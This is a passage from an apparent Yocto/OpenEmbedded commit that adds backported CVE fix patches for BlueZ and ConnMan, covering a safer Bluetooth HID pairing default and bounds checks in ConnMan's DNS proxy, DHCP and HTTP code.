114+ operand_count -= sizeof(*pdu);
115+
116+ if (pdu->params_len != operand_count) {
117+ DBG("AVRCP PDU parameters length don't match");
118+ pdu->params_len = operand_count;
119+ }
120+
121 for (handler = session->control_handlers; handler->pdu_id; handler++) {
122 if (handler->pdu_id == pdu->pdu_id)
123 break;
124--
1252.25.1
126
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
new file mode 100644
index 0000000000..43670ab2b3
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
@@ -0,0 +1,54 @@
1From 25a471a83e02e1effb15d5a488b3f0085eaeb675 Mon Sep 17 00:00:00 2001
2From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
3Date: Tue, 10 Oct 2023 13:03:12 -0700
4Subject: input.conf: Change default of ClassicBondedOnly
5
6This changes the default of ClassicBondedOnly since defaulting to false
7is not inline with HID specification which mandates the of Security Mode
84:
9
10BLUETOOTH SPECIFICATION Page 84 of 123
11Human Interface Device (HID) Profile:
12
135.4.3.4.2 Security Modes
14Bluetooth HID Hosts shall use Security Mode 4 when interoperating with
15Bluetooth HID devices that are compliant to the Bluetooth Core
16Specification v2.1+EDR[6].
17
18Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=25a471a83e02e1effb15d5a488b3f0085eaeb675]
19CVE: CVE-2023-45866
20Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
21---
22 profiles/input/device.c | 2 +-
23 profiles/input/input.conf | 2 +-
24 2 files changed, 2 insertions(+), 2 deletions(-)
25
26diff --git a/profiles/input/device.c b/profiles/input/device.c
27index 375314e..0236488 100644
28--- a/profiles/input/device.c
29+++ b/profiles/input/device.c
30@@ -93,7 +93,7 @@ struct input_device {
31
32 static int idle_timeout = 0;
33 static bool uhid_enabled = false;
34-static bool classic_bonded_only = false;
35+static bool classic_bonded_only = true;
36
37 void input_set_idle_timeout(int timeout)
38 {
39diff --git a/profiles/input/input.conf b/profiles/input/input.conf
40index 4c70bc5..d8645f3 100644
41--- a/profiles/input/input.conf
42+++ b/profiles/input/input.conf
43@@ -17,7 +17,7 @@
44 # platforms may want to make sure that input connections only come from bonded
45 # device connections. Several older mice have been known for not supporting
46 # pairing/encryption.
47-# Defaults to false to maximize device compatibility.
48+# Defaults to true for security.
49 #ClassicBondedOnly=true
50
51 # LE upgrade security
52--
532.25.1
54
diff --git a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
index 8190924562..be74a35e0a 100644
--- a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
+++ b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
@@ -3,6 +3,16 @@ require bluez5.inc
3SRC_URI[md5sum] = "94972b8bc7ade60c72b0ffa6ccff2c0a" 3SRC_URI[md5sum] = "94972b8bc7ade60c72b0ffa6ccff2c0a"
4SRC_URI[sha256sum] = "8863717113c4897e2ad3271fc808ea245319e6fd95eed2e934fae8e0894e9b88" 4SRC_URI[sha256sum] = "8863717113c4897e2ad3271fc808ea245319e6fd95eed2e934fae8e0894e9b88"
5 5
6# These issues have kernel fixes rather than bluez fixes so exclude here
7CVE_CHECK_WHITELIST += "CVE-2020-12352 CVE-2020-24490"
8
9# Commit 7a80d2096f1b7125085e21448112aa02f49f5e9a, e2b0f0d8d63e1223bb714a9efb37e2257818268b
10# and 0388794dc5fdb73a4ea88bcf148de0a12b4364d4 to fix CVE-2022-39177
11# already backport in CVE-2022-39176.patch
12# https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1977968
13
14CVE_CHECK_WHITELIST += "CVE-2022-39177"
15
6# noinst programs in Makefile.tools that are conditional on READLINE 16# noinst programs in Makefile.tools that are conditional on READLINE
7# support 17# support
8NOINST_TOOLS_READLINE ?= " \ 18NOINST_TOOLS_READLINE ?= " \
diff --git a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
index 778bf50191..24593d6258 100644
--- a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
+++ b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
@@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native"
10 10
11# 0.7 tag 11# 0.7 tag
12SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143" 12SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143"
13SRC_URI = "git://github.com/connectivity/connman-gnome.git \ 13SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \
14 file://0001-Removed-icon-from-connman-gnome-about-applet.patch \ 14 file://0001-Removed-icon-from-connman-gnome-about-applet.patch \
15 file://null_check_for_ipv4_config.patch \ 15 file://null_check_for_ipv4_config.patch \
16 file://images/* \ 16 file://images/* \
diff --git a/meta/recipes-connectivity/connman/connman.inc b/meta/recipes-connectivity/connman/connman.inc
index 55e5bf97c7..c495ae29ad 100644
--- a/meta/recipes-connectivity/connman/connman.inc
+++ b/meta/recipes-connectivity/connman/connman.inc
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
15 15
16inherit autotools pkgconfig systemd update-rc.d update-alternatives 16inherit autotools pkgconfig systemd update-rc.d update-alternatives
17 17
18CVE_PRODUCT = "connman connection_manager"
19
18DEPENDS = "dbus glib-2.0 ppp" 20DEPENDS = "dbus glib-2.0 ppp"
19 21
20INC_PR = "r20" 22INC_PR = "r20"
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
new file mode 100644
index 0000000000..2648a832ca
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
@@ -0,0 +1,62 @@
1From e4079a20f617a4b076af503f6e4e8b0304c9f2cb Mon Sep 17 00:00:00 2001
2From: Colin Wee <cwee@tesla.com>
3Date: Thu, 28 Jan 2021 19:41:53 +0100
4Subject: [PATCH] dnsproxy: Add length checks to prevent buffer overflow
5
6Fixes: CVE-2021-26675
7
8Upstream-Status: Backport
9CVE: CVE-2021-26675
10
11Reference to upstream patch:
12https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e4079a20f617a4b076af503f6e4e8b0304c9f2cb
13
14Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
15---
16 src/dnsproxy.c | 14 +++++++++++---
17 1 file changed, 11 insertions(+), 3 deletions(-)
18
19diff --git a/src/dnsproxy.c b/src/dnsproxy.c
20index a7bf87a1..4f5c897f 100644
21--- a/src/dnsproxy.c
22+++ b/src/dnsproxy.c
23@@ -1767,6 +1767,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
24 char **uncompressed_ptr)
25 {
26 char *uptr = *uncompressed_ptr; /* position in result buffer */
27+ char * const uncomp_end = uncompressed + uncomp_len - 1;
28
29 debug("count %d ptr %p end %p uptr %p", field_count, ptr, end, uptr);
30
31@@ -1787,12 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
32 * tmp buffer.
33 */
34
35- ulen = strlen(name);
36- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
37-
38 debug("pos %d ulen %d left %d name %s", pos, ulen,
39 (int)(uncomp_len - (uptr - uncompressed)), uptr);
40
41+ ulen = strlen(name);
42+ if ((uptr + ulen + 1) > uncomp_end) {
43+ goto out;
44+ }
45+ strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
46+
47 uptr += ulen;
48 *uptr++ = '\0';
49
50@@ -1802,6 +1806,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
51 * We copy also the fixed portion of the result (type, class,
52 * ttl, address length and the address)
53 */
54+ if ((uptr + NS_RRFIXEDSZ) > uncomp_end) {
55+ debug("uncompressed data too large for buffer");
56+ goto out;
57+ }
58 memcpy(uptr, ptr, NS_RRFIXEDSZ);
59
60 dns_type = uptr[0] << 8 | uptr[1];
61--
622.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
new file mode 100644
index 0000000000..4104e4bfc6
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
@@ -0,0 +1,231 @@
1From 58d397ba74873384aee449690a9070bacd5676fa Mon Sep 17 00:00:00 2001
2From: Colin Wee <cwee@tesla.com>
3Date: Thu, 28 Jan 2021 19:39:14 +0100
4Subject: [PATCH] gdhcp: Avoid reading invalid data in dhcp_get_option
5
6Upstream-Status: Backport
7CVE: CVE-2021-26676
8
9Reference to upstream patch:
10https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=58d397ba74873384aee449690a9070bacd5676fa
11
12Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
13---
14 gdhcp/client.c | 20 +++++++++++---------
15 gdhcp/common.c | 24 +++++++++++++++++++-----
16 gdhcp/common.h | 2 +-
17 gdhcp/server.c | 12 +++++++-----
18 4 files changed, 38 insertions(+), 20 deletions(-)
19
20diff --git a/gdhcp/client.c b/gdhcp/client.c
21index 09dfe5ec..6a5613e7 100644
22--- a/gdhcp/client.c
23+++ b/gdhcp/client.c
24@@ -1629,12 +1629,12 @@ static void start_request(GDHCPClient *dhcp_client)
25 NULL);
26 }
27
28-static uint32_t get_lease(struct dhcp_packet *packet)
29+static uint32_t get_lease(struct dhcp_packet *packet, uint16_t packet_len)
30 {
31 uint8_t *option;
32 uint32_t lease_seconds;
33
34- option = dhcp_get_option(packet, DHCP_LEASE_TIME);
35+ option = dhcp_get_option(packet, packet_len, DHCP_LEASE_TIME);
36 if (!option)
37 return 3600;
38
39@@ -2226,7 +2226,8 @@ static void get_dhcpv6_request(GDHCPClient *dhcp_client,
40 }
41 }
42
43-static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
44+static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet,
45+ uint16_t packet_len)
46 {
47 GDHCPOptionType type;
48 GList *list, *value_list;
49@@ -2237,7 +2238,7 @@ static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
50 for (list = dhcp_client->request_list; list; list = list->next) {
51 code = (uint8_t) GPOINTER_TO_INT(list->data);
52
53- option = dhcp_get_option(packet, code);
54+ option = dhcp_get_option(packet, packet_len, code);
55 if (!option) {
56 g_hash_table_remove(dhcp_client->code_value_hash,
57 GINT_TO_POINTER((int) code));
58@@ -2297,6 +2298,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
59 re = dhcp_recv_l2_packet(&packet,
60 dhcp_client->listener_sockfd,
61 &dst_addr);
62+ pkt_len = (uint16_t)(unsigned int)re;
63 xid = packet.xid;
64 } else if (dhcp_client->listen_mode == L3) {
65 if (dhcp_client->type == G_DHCP_IPV6) {
66@@ -2361,7 +2363,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
67 dhcp_client->status_code = status;
68 }
69 } else {
70- message_type = dhcp_get_option(&packet, DHCP_MESSAGE_TYPE);
71+ message_type = dhcp_get_option(&packet, pkt_len, DHCP_MESSAGE_TYPE);
72 if (!message_type)
73 return TRUE;
74 }
75@@ -2378,7 +2380,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
76 dhcp_client->timeout = 0;
77 dhcp_client->retry_times = 0;
78
79- option = dhcp_get_option(&packet, DHCP_SERVER_ID);
80+ option = dhcp_get_option(&packet, pkt_len, DHCP_SERVER_ID);
81 dhcp_client->server_ip = get_be32(option);
82 dhcp_client->requested_ip = ntohl(packet.yiaddr);
83
84@@ -2428,9 +2430,9 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
85
86 remove_timeouts(dhcp_client);
87
88- dhcp_client->lease_seconds = get_lease(&packet);
89+ dhcp_client->lease_seconds = get_lease(&packet, pkt_len);
90
91- get_request(dhcp_client, &packet);
92+ get_request(dhcp_client, &packet, pkt_len);
93
94 switch_listening_mode(dhcp_client, L_NONE);
95
96@@ -2438,7 +2440,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
97 dhcp_client->assigned_ip = get_ip(packet.yiaddr);
98
99 if (dhcp_client->state == REBOOTING) {
100- option = dhcp_get_option(&packet,
101+ option = dhcp_get_option(&packet, pkt_len,
102 DHCP_SERVER_ID);
103 dhcp_client->server_ip = get_be32(option);
104 }
105diff --git a/gdhcp/common.c b/gdhcp/common.c
106index 1d667d17..c8916aa8 100644
107--- a/gdhcp/common.c
108+++ b/gdhcp/common.c
109@@ -73,18 +73,21 @@ GDHCPOptionType dhcp_get_code_type(uint8_t code)
110 return OPTION_UNKNOWN;
111 }
112
113-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
114+uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code)
115 {
116 int len, rem;
117- uint8_t *optionptr;
118+ uint8_t *optionptr, *options_end;
119+ size_t options_len;
120 uint8_t overload = 0;
121
122 /* option bytes: [code][len][data1][data2]..[dataLEN] */
123 optionptr = packet->options;
124 rem = sizeof(packet->options);
125+ options_len = packet_len - (sizeof(*packet) - sizeof(packet->options));
126+ options_end = optionptr + options_len - 1;
127
128 while (1) {
129- if (rem <= 0)
130+ if ((rem <= 0) && (optionptr + OPT_CODE > options_end))
131 /* Bad packet, malformed option field */
132 return NULL;
133
134@@ -115,14 +118,25 @@ uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
135 break;
136 }
137
138+ if (optionptr + OPT_LEN > options_end) {
139+ /* bad packet, would read length field from OOB */
140+ return NULL;
141+ }
142+
143 len = 2 + optionptr[OPT_LEN];
144
145 rem -= len;
146 if (rem < 0)
147 continue; /* complain and return NULL */
148
149- if (optionptr[OPT_CODE] == code)
150- return optionptr + OPT_DATA;
151+ if (optionptr[OPT_CODE] == code) {
152+ if (optionptr + len > options_end) {
153+ /* bad packet, option length points OOB */
154+ return NULL;
155+ } else {
156+ return optionptr + OPT_DATA;
157+ }
158+ }
159
160 if (optionptr[OPT_CODE] == DHCP_OPTION_OVERLOAD)
161 overload |= optionptr[OPT_DATA];
162diff --git a/gdhcp/common.h b/gdhcp/common.h
163index 9660231c..8f63fd75 100644
164--- a/gdhcp/common.h
165+++ b/gdhcp/common.h
166@@ -179,7 +179,7 @@ struct in6_pktinfo {
167 };
168 #endif
169
170-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code);
171+uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code);
172 uint8_t *dhcpv6_get_option(struct dhcpv6_packet *packet, uint16_t pkt_len,
173 int code, uint16_t *option_len, int *option_count);
174 uint8_t *dhcpv6_get_sub_option(unsigned char *option, uint16_t max_len,
175diff --git a/gdhcp/server.c b/gdhcp/server.c
176index 85405f19..52ea2a55 100644
177--- a/gdhcp/server.c
178+++ b/gdhcp/server.c
179@@ -413,7 +413,7 @@ error:
180 }
181
182
183-static uint8_t check_packet_type(struct dhcp_packet *packet)
184+static uint8_t check_packet_type(struct dhcp_packet *packet, uint16_t packet_len)
185 {
186 uint8_t *type;
187
188@@ -423,7 +423,7 @@ static uint8_t check_packet_type(struct dhcp_packet *packet)
189 if (packet->op != BOOTREQUEST)
190 return 0;
191
192- type = dhcp_get_option(packet, DHCP_MESSAGE_TYPE);
193+ type = dhcp_get_option(packet, packet_len, DHCP_MESSAGE_TYPE);
194
195 if (!type)
196 return 0;
197@@ -651,6 +651,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
198 struct dhcp_lease *lease;
199 uint32_t requested_nip = 0;
200 uint8_t type, *server_id_option, *request_ip_option;
201+ uint16_t packet_len;
202 int re;
203
204 if (condition & (G_IO_NVAL | G_IO_ERR | G_IO_HUP)) {
205@@ -661,12 +662,13 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
206 re = dhcp_recv_l3_packet(&packet, dhcp_server->listener_sockfd);
207 if (re < 0)
208 return TRUE;
209+ packet_len = (uint16_t)(unsigned int)re;
210
211- type = check_packet_type(&packet);
212+ type = check_packet_type(&packet, packet_len);
213 if (type == 0)
214 return TRUE;
215
216- server_id_option = dhcp_get_option(&packet, DHCP_SERVER_ID);
217+ server_id_option = dhcp_get_option(&packet, packet_len, DHCP_SERVER_ID);
218 if (server_id_option) {
219 uint32_t server_nid =
220 get_unaligned((const uint32_t *) server_id_option);
221@@ -675,7 +677,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
222 return TRUE;
223 }
224
225- request_ip_option = dhcp_get_option(&packet, DHCP_REQUESTED_IP);
226+ request_ip_option = dhcp_get_option(&packet, packet_len, DHCP_REQUESTED_IP);
227 if (request_ip_option)
228 requested_nip = get_be32(request_ip_option);
229
230--
2312.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
new file mode 100644
index 0000000000..ce909ec293
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
@@ -0,0 +1,33 @@
1From a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1 Mon Sep 17 00:00:00 2001
2From: Colin Wee <cwee@tesla.com>
3Date: Thu, 28 Jan 2021 19:41:09 +0100
4Subject: [PATCH] gdhcp: Avoid leaking stack data via unitiialized variable
5
6Fixes: CVE-2021-26676
7
8Upstream-Status: Backport
9CVE: CVE-2021-26676
10
11Reference to upstream patch:
12https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1
13
14Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
15---
16 gdhcp/client.c | 2 +-
17 1 file changed, 1 insertion(+), 1 deletion(-)
18
19diff --git a/gdhcp/client.c b/gdhcp/client.c
20index 6a5613e7..c7b85e58 100644
21--- a/gdhcp/client.c
22+++ b/gdhcp/client.c
23@@ -2270,7 +2270,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
24 {
25 GDHCPClient *dhcp_client = user_data;
26 struct sockaddr_in dst_addr = { 0 };
27- struct dhcp_packet packet;
28+ struct dhcp_packet packet = { 0 };
29 struct dhcpv6_packet *packet6 = NULL;
30 uint8_t *message_type = NULL, *client_id = NULL, *option,
31 *server_id = NULL;
32--
332.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
new file mode 100644
index 0000000000..770948fb69
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
@@ -0,0 +1,72 @@
1From eceb2e8d2341c041df55a5e2f047d9a8c491463c Mon Sep 17 00:00:00 2001
2From: Valery Kashcheev <v.kascheev@omp.ru>
3Date: Mon, 7 Jun 2021 18:58:24 +0200
4Subject: dnsproxy: Check the length of buffers before memcpy
5
6Fix using a stack-based buffer overflow attack by checking the length of
7the ptr and uptr buffers.
8
9Fix debug message output.
10
11Fixes: CVE-2021-33833
12
13Upstream-Status: Backport
14https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=eceb2e8d2341c041df55a5e2f047d9a8c491463c
15CVE: CVE-2021-33833
16Signed-off-by: Steve Sakoman <steve@sakoman.com>
17
18---
19 src/dnsproxy.c | 20 +++++++++++---------
20 1 file changed, 11 insertions(+), 9 deletions(-)
21
22diff --git a/src/dnsproxy.c b/src/dnsproxy.c
23index de52df5a..38dbdd71 100644
24--- a/src/dnsproxy.c
25+++ b/src/dnsproxy.c
26@@ -1788,17 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
27 * tmp buffer.
28 */
29
30- debug("pos %d ulen %d left %d name %s", pos, ulen,
31- (int)(uncomp_len - (uptr - uncompressed)), uptr);
32-
33- ulen = strlen(name);
34- if ((uptr + ulen + 1) > uncomp_end) {
35+ ulen = strlen(name) + 1;
36+ if ((uptr + ulen) > uncomp_end)
37 goto out;
38- }
39- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
40+ strncpy(uptr, name, ulen);
41+
42+ debug("pos %d ulen %d left %d name %s", pos, ulen,
43+ (int)(uncomp_end - (uptr + ulen)), uptr);
44
45 uptr += ulen;
46- *uptr++ = '\0';
47
48 ptr += pos;
49
50@@ -1841,7 +1839,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
51 } else if (dns_type == ns_t_a || dns_type == ns_t_aaaa) {
52 dlen = uptr[-2] << 8 | uptr[-1];
53
54- if (ptr + dlen > end) {
55+ if ((ptr + dlen) > end || (uptr + dlen) > uncomp_end) {
56 debug("data len %d too long", dlen);
57 goto out;
58 }
59@@ -1880,6 +1878,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
60 * refresh interval, retry interval, expiration
61 * limit and minimum ttl). They are 20 bytes long.
62 */
63+ if ((uptr + 20) > uncomp_end || (ptr + 20) > end) {
64+ debug("soa record too long");
65+ goto out;
66+ }
67 memcpy(uptr, ptr, 20);
68 uptr += 20;
69 ptr += 20;
70--
71cgit 1.2.3-1.el7
72
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
new file mode 100644
index 0000000000..7f27474830
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
@@ -0,0 +1,121 @@
1From e5a313736e13c90d19085e953a26256a198e4950 Mon Sep 17 00:00:00 2001
2From: Daniel Wagner <wagi@monom.org>
3Date: Tue, 25 Jan 2022 10:00:24 +0100
4Subject: dnsproxy: Validate input data before using them
5
6dnsproxy is not validating various input data. Add a bunch of checks.
7
8Fixes: CVE-2022-23097
9Fixes: CVE-2022-23096
10
11Upstream-Status: Backport
12https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e5a313736e13c90d19085e953a26256a198e4950
13
14CVE: CVE-2022-23096 CVE-2022-23097
15Signed-off-by: Steve Sakoman <steve@sakoman.com>
16
17---
18 src/dnsproxy.c | 31 ++++++++++++++++++++++++++-----
19 1 file changed, 26 insertions(+), 5 deletions(-)
20
21diff --git a/src/dnsproxy.c b/src/dnsproxy.c
22index cdfafbc2..c027bcb9 100644
23--- a/src/dnsproxy.c
24+++ b/src/dnsproxy.c
25@@ -1951,6 +1951,12 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
26
27 if (offset < 0)
28 return offset;
29+ if (reply_len < 0)
30+ return -EINVAL;
31+ if (reply_len < offset + 1)
32+ return -EINVAL;
33+ if ((size_t)reply_len < sizeof(struct domain_hdr))
34+ return -EINVAL;
35
36 hdr = (void *)(reply + offset);
37 dns_id = reply[offset] | reply[offset + 1] << 8;
38@@ -1986,23 +1992,31 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
39 */
40 if (req->append_domain && ntohs(hdr->qdcount) == 1) {
41 uint16_t domain_len = 0;
42- uint16_t header_len;
43+ uint16_t header_len, payload_len;
44 uint16_t dns_type, dns_class;
45 uint8_t host_len, dns_type_pos;
46 char uncompressed[NS_MAXDNAME], *uptr;
47 char *ptr, *eom = (char *)reply + reply_len;
48+ char *domain;
49
50 /*
51 * ptr points to the first char of the hostname.
52 * ->hostname.domain.net
53 */
54 header_len = offset + sizeof(struct domain_hdr);
55+ if (reply_len < header_len)
56+ return -EINVAL;
57+ payload_len = reply_len - header_len;
58+
59 ptr = (char *)reply + header_len;
60
61 host_len = *ptr;
62+ domain = ptr + 1 + host_len;
63+ if (domain > eom)
64+ return -EINVAL;
65+
66 if (host_len > 0)
67- domain_len = strnlen(ptr + 1 + host_len,
68- reply_len - header_len);
69+ domain_len = strnlen(domain, eom - domain);
70
71 /*
72 * If the query type is anything other than A or AAAA,
73@@ -2011,6 +2025,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
74 */
75 dns_type_pos = host_len + 1 + domain_len + 1;
76
77+ if (ptr + (dns_type_pos + 3) > eom)
78+ return -EINVAL;
79 dns_type = ptr[dns_type_pos] << 8 |
80 ptr[dns_type_pos + 1];
81 dns_class = ptr[dns_type_pos + 2] << 8 |
82@@ -2040,6 +2056,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
83 int new_len, fixed_len;
84 char *answers;
85
86+ if (len > payload_len)
87+ return -EINVAL;
88 /*
89 * First copy host (without domain name) into
90 * tmp buffer.
91@@ -2054,6 +2072,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
92 * Copy type and class fields of the question.
93 */
94 ptr += len + domain_len + 1;
95+ if (ptr + NS_QFIXEDSZ > eom)
96+ return -EINVAL;
97 memcpy(uptr, ptr, NS_QFIXEDSZ);
98
99 /*
100@@ -2063,6 +2083,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
101 uptr += NS_QFIXEDSZ;
102 answers = uptr;
103 fixed_len = answers - uncompressed;
104+ if (ptr + offset > eom)
105+ return -EINVAL;
106
107 /*
108 * We then uncompress the result to buffer
109@@ -2257,8 +2279,7 @@ static gboolean udp_server_event(GIOChannel *channel, GIOCondition condition,
110
111 len = recv(sk, buf, sizeof(buf), 0);
112
113- if (len >= 12)
114- forward_dns_reply(buf, len, IPPROTO_UDP, data);
115+ forward_dns_reply(buf, len, IPPROTO_UDP, data);
116
117 return TRUE;
118 }
119--
120cgit 1.2.3-1.el7
121
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
new file mode 100644
index 0000000000..a40c9f583f
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
@@ -0,0 +1,50 @@
1From d8708b85c1e8fe25af7803e8a20cf20e7201d8a4 Mon Sep 17 00:00:00 2001
2From: Matthias Gerstner <mgerstner@suse.de>
3Date: Tue, 25 Jan 2022 10:00:25 +0100
4Subject: dnsproxy: Avoid 100 % busy loop in TCP server case
5
6Once the TCP socket is connected and until the remote server is
7responding (if ever) ConnMan executes a 100 % CPU loop, since
8the connected socket will always be writable (G_IO_OUT).
9
10To fix this, modify the watch after the connection is established to
11remove the G_IO_OUT from the callback conditions.
12
13Fixes: CVE-2022-23098
14
15Upstream-Status: Backport
16https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d8708b85c1e8fe25af7803e8a20cf20e7201d8a4
17
18CVE: CVE-2022-23098
19Signed-off-by: Steve Sakoman <steve@sakoman.com>
20
21---
22 src/dnsproxy.c | 12 ++++++++++++
23 1 file changed, 12 insertions(+)
24
25diff --git a/src/dnsproxy.c b/src/dnsproxy.c
26index c027bcb9..1ccf36a9 100644
27--- a/src/dnsproxy.c
28+++ b/src/dnsproxy.c
29@@ -2360,6 +2360,18 @@ hangup:
30 }
31 }
32
33+ /*
34+ * Remove the G_IO_OUT flag from the watch, otherwise we end
35+ * up in a busy loop, because the socket is constantly writable.
36+ *
37+ * There seems to be no better way in g_io to do that than
38+ * re-adding the watch.
39+ */
40+ g_source_remove(server->watch);
41+ server->watch = g_io_add_watch(server->channel,
42+ G_IO_IN | G_IO_HUP | G_IO_NVAL | G_IO_ERR,
43+ tcp_server_event, server);
44+
45 server->connected = true;
46 server_list = g_slist_append(server_list, server);
47
48--
49cgit 1.2.3-1.el7
50
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
new file mode 100644
index 0000000000..74a739d6a2
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
@@ -0,0 +1,37 @@
1From d1a5ede5d255bde8ef707f8441b997563b9312bd Mon Sep 17 00:00:00 2001
2From: Nathan Crandall <ncrandall@tesla.com>
3Date: Tue, 12 Jul 2022 08:56:34 +0200
4Subject: gweb: Fix OOB write in received_data()
5
6There is a mismatch of handling binary vs. C-string data with memchr
7and strlen, resulting in pos, count, and bytes_read to become out of
8sync and result in a heap overflow. Instead, do not treat the buffer
9as an ASCII C-string. We calculate the count based on the return value
10of memchr, instead of strlen.
11
12Fixes: CVE-2022-32292
13
14Upstream-Status: Backport
15https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d1a5ede5d255bde8ef707f8441b997563b9312b
16CVE: CVE-2022-32292
17Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
18---
19 gweb/gweb.c | 2 +-
20 1 file changed, 1 insertion(+), 1 deletion(-)
21
22diff --git a/gweb/gweb.c b/gweb/gweb.c
23index 12fcb1d8..13c6c5f2 100644
24--- a/gweb/gweb.c
25+++ b/gweb/gweb.c
26@@ -918,7 +918,7 @@ static gboolean received_data(GIOChannel *channel, GIOCondition cond,
27 }
28
29 *pos = '\0';
30- count = strlen((char *) ptr);
31+ count = pos - ptr;
32 if (count > 0 && ptr[count - 1] == '\r') {
33 ptr[--count] = '\0';
34 bytes_read--;
35--
36cgit
37
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
new file mode 100644
index 0000000000..83a013981c
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
@@ -0,0 +1,266 @@
1From 358a44b1442fae0f82846e10da0708b5c4e1ce27 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Tue, 20 Sep 2022 17:58:19 +0530
4Subject: [PATCH] CVE-2022-32293
5
6CVE: CVE-2022-32293
